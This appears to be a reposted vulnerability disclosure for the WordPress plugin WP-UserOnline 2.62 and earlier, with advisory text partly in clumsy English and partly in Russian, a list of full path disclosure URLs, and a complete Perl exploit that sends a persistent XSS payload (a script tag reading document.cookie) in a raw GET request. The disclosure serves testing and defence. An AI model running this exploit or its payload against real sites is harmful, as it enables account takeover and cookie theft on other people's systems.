Persistent XSS vulnerability in WP-UserOnline

In 2010 I've disclosed multiple vulnerabilities (Cross-Site Scripting and
Full path disclosure) in WordPress plugin WP-UserOnline
And recently I've disclosed  the exploit for persistent XSS vulnerability in WP-UserOnline.
It must be interesting for those who want to test this vulnerability.

Exploit:

http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt

This perl exploit I've developed at 26.04.2010.

As I've wrote earlier, vulnerable are WP-UserOnline 2.62 and previous
versions. After my informing the developer released WP-UserOnline 2.70 (at
07.05.2010). In version 2.70 he fixed XSS, but not Full path disclosure
vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Past Vulnerabilities
Welcome 3APA3A! Tells you I had found Cross-Site Scripting and Full path disclosure vulnerabilities in the plugin WP-UserOnline for WordPress. XSS: With a special request to the site can be made ​​XSS attack. For this you need a special way (not the browser) send a GET request to the page http://site/? <script> alert (document.cookie) </ script>. This persistent XSS. Vulnerability appears on page http://site/wp-admin/index.php?page=wp-useronline. Full path WP-UserOnline 2.62 and earlier versions. In the version of WP-UserOnline 2.70 by fixed XSS, but not Full path disclosure vulnerabilities. More information about these vulnerabilities at my site: http://websecurity.com.ua/4177/ Best wishes & Regards, MustLive site administrator http:/ / websecurity.com.ua


Это persistent XSS. Уязвимость проявляется на странице http://site/wp-admin/index.php?page=wp-useronline.

Full path disclosure:

http://site/wp-content/plugins/wp-useronline/admin.php

http://site/wp-content/plugins/wp-useronline/widget.php

http://site/wp-content/plugins/wp-useronline/wp-stats.php

http://site/wp-content/plugins/wp-useronline/wp-useronline.php

http://site/wp-content/plugins/wp-useronline/scb/Widget.php

http://site/wp-content/plugins/wp-useronline/scb/load.php

Уязвимы WP-UserOnline 2.62  и предыдущие версии. В версии WP-UserOnline 2.70 автор исправил XSS, но не Full path disclosure уязвимости.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4177/





#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;

my ($host,$sock,$content,$response);

$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
print "The Socket: $!\n";
exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
$content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
$response = $1;
}
if ($response == 200 or $response == 400) {
print "OK\n";
}
else {
print "Error: $response\n";
}




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information